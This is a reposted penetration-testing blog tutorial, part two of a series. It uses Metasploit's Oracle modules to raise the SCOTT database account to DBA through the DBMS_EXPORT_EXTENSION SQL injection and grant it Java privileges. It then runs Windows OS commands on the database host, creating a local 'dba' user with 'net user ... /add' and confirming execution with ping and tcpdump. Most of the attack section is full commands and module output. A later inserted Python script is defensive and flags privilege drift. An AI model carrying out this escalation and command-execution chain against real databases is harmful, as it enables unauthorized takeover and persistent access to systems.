Oracle Pwnage with the Metasploit Oracle Modules Part 2

admin, 2017-05-01 15:19:02
Posted by CG

Last post we got to where we could execute SQL queries on the box and were able to see Scott’s permissions.

Let’s use the SQLI auxiliary modules to see if we can add the DBA privilege to Scott’s account.

As you recall…

msf auxiliary(oracle_sql) > run

[*] Sending SQL…
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done…
[*] Auxiliary module execution completed

Let’s try to escalate to DBA with the DBMS_EXPORT_EXTENSION exploit (auxiliary module).

msf auxiliary(oracle_sql) > back
msf > use auxiliary/sqli/oracle/
use auxiliary/sqli/oracle/ctxsys_driload
use auxiliary/sqli/oracle/dbms_export_extension
use auxiliary/sqli/oracle/dbms_metadata
use auxiliary/sqli/oracle/lt_findricset
use auxiliary/sqli/oracle/pitrig_truncate
msf > use auxiliary/sqli/oracle/dbms_export_extension
msf auxiliary(dbms_export_extension) > info

Name: SQL Injection via DBMS_EXPORT_EXTENSION.
Version: $Revision:$

Provided by:
MC

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  DBA     SCOTT            no        DB user to elevate to DBA.
  DBPASS  TIGER            yes       The password to authenticate as.
  DBUSER  SCOTT            yes       The username to authenticate as.
  RHOST   127.0.0.1        yes       The Oracle host.
  RPORT   1521             yes       The TNS port.
  SID     DEMO             yes       The sid to authenticate with.

Description:
This module will escalate a Oracle DB user to DBA by exploiting an
sql injection bug in the DBMS_EXPORT_EXTENSION package.

msf auxiliary(dbms_export_extension) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(dbms_export_extension) > set SID UNLUCKYXDB.MYPWN
SID => UNLUCKYXDB.MYPWN
msf auxiliary(dbms_export_extension) > run

[*] Sending package…
[*] Done…
[*] Sending body…
[*] Done…
[*] Sending declare…
[*] Done…
[*] Auxiliary module execution completed
msf auxiliary(dbms_export_extension) >

Let’s check…

msf > use auxiliary/admin/oracle/oracle_sql
msf auxiliary(oracle_sql) > **Same settings as before; check user’s roles
msf auxiliary(oracle_sql) > run

[*] Sending SQL…
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,DBA,NO,YES,NO <-- New privileges
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done…
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >

Let’s add Java privileges to the Scott account.

msf auxiliary(oracle_sql) > set SQL “grant javasyspriv to SCOTT”
SQL => grant javasyspriv to SCOTT
msf auxiliary(oracle_sql) > run

[*] Sending SQL…
[*] Done…
[*] Auxiliary module execution completed

Let’s check to see if it worked.

msf auxiliary(oracle_sql) > set SQL “select * from user_role_privs”
SQL => select * from user_role_privs
msf auxiliary(oracle_sql) > run

[*] Sending SQL…
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,DBA,NO,YES,NO
[*] SCOTT,JAVASYSPRIV,NO,YES,NO <-- Yup, it worked
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done…
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >
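The two "Let's check" steps above both read SCOTT's rows from USER_ROLE_PRIVS through the oracle_sql module and eyeball them for a new DBA or JAVASYSPRIV row. From the defender's side the same output is what you want to diff automatically: a baseline snapshot of role grants against a current one, with an alert whenever a sensitive role appears. The script below is an added example and is not code from the original post or from Metasploit. It assumes the five comma-separated fields the module prints map to the USER_ROLE_PRIVS columns USERNAME, GRANTED_ROLE, ADMIN_OPTION, DEFAULT_ROLE and OS_GRANTED (the column set of the 9i/10g view), and the two snapshots are constructed from the shape of the output shown in the post.

```python
"""Parse USER_ROLE_PRIVS rows as printed by the oracle_sql module and flag
privilege drift, e.g. SCOTT suddenly holding DBA or JAVASYSPRIV.

Added example, not part of the original post. Assumes the five fields map to
USERNAME, GRANTED_ROLE, ADMIN_OPTION, DEFAULT_ROLE, OS_GRANTED (9i/10g view).
"""
import re
from typing import Dict, List, Set, Tuple

COLUMNS = ("USERNAME", "GRANTED_ROLE", "ADMIN_OPTION", "DEFAULT_ROLE", "OS_GRANTED")

# Roles whose unexpected appearance on an ordinary account is a finding.
SENSITIVE_ROLES = {"DBA", "JAVASYSPRIV", "EXP_FULL_DATABASE", "IMP_FULL_DATABASE"}

# A data row: "[*] " followed by exactly five comma-separated upper-case fields.
# Status lines such as "[*] Sending SQL..." or "[*] Done..." do not match.
ROW_RE = re.compile(r"^\[\*\]\s+([A-Z0-9_$#]+(?:,[A-Z0-9_$#]*){4})\s*$")


def parse_role_rows(output: str) -> List[Dict[str, str]]:
    """Return one dict per USER_ROLE_PRIVS row found in the module output."""
    rows = []
    for line in output.splitlines():
        match = ROW_RE.match(line.strip())
        if not match:
            continue
        rows.append(dict(zip(COLUMNS, match.group(1).split(","))))
    return rows


def grants(rows: List[Dict[str, str]]) -> Set[Tuple[str, str]]:
    """Reduce rows to (user, role) pairs so two snapshots can be set-diffed."""
    return {(r["USERNAME"], r["GRANTED_ROLE"]) for r in rows}


def privilege_drift(baseline: str, current: str) -> Dict[str, List[Tuple[str, str]]]:
    """Diff two snapshots: added and removed grants, plus the sensitive additions."""
    before = grants(parse_role_rows(baseline))
    after = grants(parse_role_rows(current))
    added = sorted(after - before)
    removed = sorted(before - after)
    alerts = [g for g in added if g[1] in SENSITIVE_ROLES]
    return {"added": added, "removed": removed, "alerts": alerts}


# Constructed snapshots, modelled on the module output shown in the post.
BASELINE = """\
[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed
"""

CURRENT = """\
[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,DBA,NO,YES,NO
[*] SCOTT,JAVASYSPRIV,NO,YES,NO
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed
"""

if __name__ == "__main__":
    report = privilege_drift(BASELINE, CURRENT)
    for user, role in report["alerts"]:
        print(f"ALERT: {user} gained sensitive role {role}")
    print("added:", report["added"])
    print("removed:", report["removed"])
```

On the database side the equivalent check is a scheduled query against DBA_ROLE_PRIVS (all users, not just the connected one) compared with a stored baseline; the parser above is for the case where the only artefact you have is captured tool output or a log of it.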

From there we can use the oracle_win32 auxiliary module to execute commands:
http://metasploit.com/users/mc/oracle9i/oracle_win32.rb

msf > use auxiliary/admin/oracle/oracle_win32
msf auxiliary(oracle_win32) > info

Name: Execute win32 OS commands
Version: $Revision:$

Provided by:
MC

Basic options:
  Name    Current Setting                                   Required  Description
  ----    ---------------                                   --------  -----------
  CMD     echo metasploit > %SYSTEMDRIVE%//unbreakable.txt  no        The OS command to execute.
  DBPASS  TIGER                                             yes       The password to authenticate as.
  DBUSER  SCOTT                                             yes       The username to authenticate as.
  RHOST   127.0.0.1                                         yes       The Oracle host.
  RPORT   1521                                              yes       The TNS port.
  SID     DEMO                                              yes       The sid to authenticate with.

Description:
This module will create a java class which enables the execution of OS commands.

msf auxiliary(oracle_win32) > set CMD “net user dba [email protected] /add”
CMD => net user dba [email protected] /add
msf auxiliary(oracle_win32) > set SID UNLUCKYXDB.MYPWN
SID => UNLUCKYXDB.MYPWN
msf auxiliary(oracle_win32) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(oracle_win32) > run

[*] Creating MSF JAVA class…
[*] Done…
[*] Creating MSF procedure…
[*] Done…
[*] Sending command: ‘net user dbaa [email protected] /add’
[*] Done…
[*] Auxiliary module execution completed

Or you can verify that your commands are executing by using ping:

msf auxiliary(oracle_win32) > set CMD “ping 192.168.100.50”
CMD => ping 192.168.100.50
msf auxiliary(oracle_win32) > run

[*] Creating MSF JAVA class…
[*] Done…
[*] Creating MSF procedure…
[*] Done…
[*] Sending command: ‘ping 192.168.100.50’
[*] Done…
[*] Auxiliary module execution completed
msf auxiliary(oracle_win32) >

On the other end, run tcpdump and filter for ICMP:

sudo tcpdump -i eth0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
01:11:26.123515 IP 192.168.100.25 > 192.168.100.50: ICMP echo request, id 0, seq 8192, length 40
01:11:26.343528 IP 192.168.100.50 > 192.168.100.25: ICMP echo reply, id 0, seq 8192, length 40
—SNIP—

8 packets captured
8 packets received by filter
0 packets dropped by kernel

For the ninja shit, check out MC’s demo text file.

**Issues: you can’t see the output of your command, so you have to run things whose results you can observe some other way; see the demo text file.

If you care to clean up, just revoke the privileges you granted with the oracle_sql module:

“revoke dba from scott”
“revoke javasyspriv from scott”

That’s it!

Reposted at CN-SEC: https://cn-sec.com/archives/45804.html